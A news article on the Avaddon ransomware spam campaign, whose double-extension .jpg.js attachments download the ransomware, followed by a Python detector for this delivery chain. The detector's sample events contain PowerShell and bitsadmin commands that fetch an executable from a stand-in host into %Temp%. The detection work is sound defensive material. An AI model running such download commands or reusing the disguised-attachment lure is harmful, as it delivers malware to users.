Avaddon Ransomware

The Avaddon ransomware has surfaced in a massive spam campaign targeting users worldwide.

Avaddon was launched at the beginning of this month and is actively recruiting hackers and malware distributors to spread the ransomware by any means possible.

As its first known attack, the Avaddon Ransomware is being distributed in a spam campaign reminiscent of February’s Nemty Ransomware Love Letter campaign.

The emails use subjects such as “Your new photo?” or “Do you like my photo?”, and their body contains nothing but a winking smiley face. The attachment is a JavaScript downloader for the Avaddon ransomware.

Example Avaddon spam email

The cybersecurity firm AppRiver stated that the Phorphiex/Trik botnet is distributing the malicious emails.

This campaign is not small, as AppRiver security researcher David Picket told us that they had blocked over 300,000 emails in just a short period.

Attached to these emails is a JavaScript file masquerading as a JPG photo, with names like IMG123101.jpg followed by the real .js extension.

Before you ask why someone would open a JavaScript file that was emailed to them, remember that Windows hides the extensions of known file types by default, even though this is a well-known security risk.

That means the recipient sees only the fake .jpg part of the name, so the attachment appears to be a photo, as shown below.

JavaScript file displayed as a JPG

When opened, the .js attachment runs under Windows Script Host and launches both a PowerShell command and a Bitsadmin command to download the Avaddon ransomware executable to the %Temp% folder and run it.
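The delivery chain above (a script host opening a double-extension “photo” and spawning PowerShell or Bitsadmin to fetch a payload into %Temp%) is easy to hunt for in process-creation telemetry. The following detector is an added example written for this article, not code from the original post or from AppRiver. It runs over constructed Sysmon-style events (field names pid/ppid/image/cmdline are an assumption; no real telemetry is included) and generalises the double-extension check beyond the .jpg.js seen in this campaign to other decoy and Windows Script Host extensions.

```python
"""Hunt for the Avaddon-style delivery chain: a Windows Script Host process
running a double-extension .js "photo" that spawns PowerShell or Bitsadmin to
download a payload into %Temp%.  Events and field names are constructed for
illustration (assumption: Sysmon-like pid/ppid/image/cmdline fields)."""
import re
from typing import Dict, List

Event = Dict[str, object]

# Decoy extension followed by a script extension, e.g. IMG123101.jpg.js.
# Generalised beyond .jpg.js (assumption: common decoy and WSH script types).
DOUBLE_EXT = re.compile(
    r"\.(jpe?g|png|gif|bmp|pdf|docx?|xlsx?)\.(js|jse|vbs|vbe|wsf|wsh)$", re.I)
SCRIPT_EXT = re.compile(r"\.(js|jse|vbs|vbe|wsf|wsh)$", re.I)

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
DOWNLOADERS = ("powershell.exe", "pwsh.exe", "bitsadmin.exe")

# Hints that the child process fetches a remote file and that it lands in %Temp%.
DOWNLOAD_HINTS = re.compile(
    r"(https?://|downloadfile|downloadstring|invoke-webrequest|\biwr\b|/download\b|/transfer\b)",
    re.I)
TEMP_HINTS = re.compile(r"(%temp%|\\appdata\\local\\temp\\)", re.I)

# Constructed sample events: an Explorer-launched script host with two download
# children, plus a benign admin script that spawns nothing.
SAMPLE_EVENTS: List[Event] = [
    {"pid": 4120, "ppid": 3300, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 5012, "ppid": 4120, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\IMG123101.jpg.js"'},
    {"pid": 5044, "ppid": 5012,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile("
                "'http://example.invalid/a.exe','C:\\Users\\alice\\AppData\\Local\\Temp\\a.exe')"},
    {"pid": 5060, "ppid": 5012, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job /download /priority high "
                r"http://example.invalid/a.exe %Temp%\a.exe"},
    {"pid": 6001, "ppid": 4120, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Scripts\inventory.js"'},
]


def basename(path: str) -> str:
    """Lower-cased final path component, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def looks_like_disguised_script(filename: str) -> bool:
    """True for names such as IMG123101.jpg.js that Explorer shows as IMG123101.jpg."""
    return bool(DOUBLE_EXT.search(filename))


def script_path_from_cmdline(cmdline: str) -> str:
    """Return the first (quoted or bare) argument ending in a script extension, else ''."""
    for m in re.finditer(r'"([^"]+)"|(\S+)', cmdline):
        arg = m.group(1) or m.group(2)
        if SCRIPT_EXT.search(arg):
            return arg
    return ""


def find_downloader_chains(events: List[Event]) -> List[Dict[str, object]]:
    """Flag script-host parents whose PowerShell/Bitsadmin children download into %Temp%."""
    by_parent: Dict[object, List[Event]] = {}
    for ev in events:
        by_parent.setdefault(ev["ppid"], []).append(ev)

    alerts = []
    for parent in events:
        if basename(str(parent["image"])) not in SCRIPT_HOSTS:
            continue
        script = script_path_from_cmdline(str(parent["cmdline"]))
        for child in by_parent.get(parent["pid"], []):
            if basename(str(child["image"])) not in DOWNLOADERS:
                continue
            cmd = str(child["cmdline"])
            if DOWNLOAD_HINTS.search(cmd) and TEMP_HINTS.search(cmd):
                alerts.append({
                    "parent_pid": parent["pid"],
                    "script": script,
                    "disguised": looks_like_disguised_script(basename(script)),
                    "child_pid": child["pid"],
                    "child": basename(str(child["image"])),
                })
    return alerts


if __name__ == "__main__":
    for alert in find_downloader_chains(SAMPLE_EVENTS):
        print(alert)
```

Both hints are required before an alert fires so that a legitimate PowerShell download into a project directory, or a script host that never spawns a downloader (the inventory.js event), stays quiet; the `disguised` flag is reported separately because a double-extension attachment is worth a look even when the child command is obfuscated enough to miss the download hints.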

To keep your users from being taken in by these malicious emails, enrol employees in security awareness training; two-thirds of employees received no such training in the last year, and training substantially lowers the likelihood of a successful attack. Pair it with technical controls: configure Windows to show file extensions, and block or quarantine script attachments such as .js files at the mail gateway so the downloader never reaches the user.
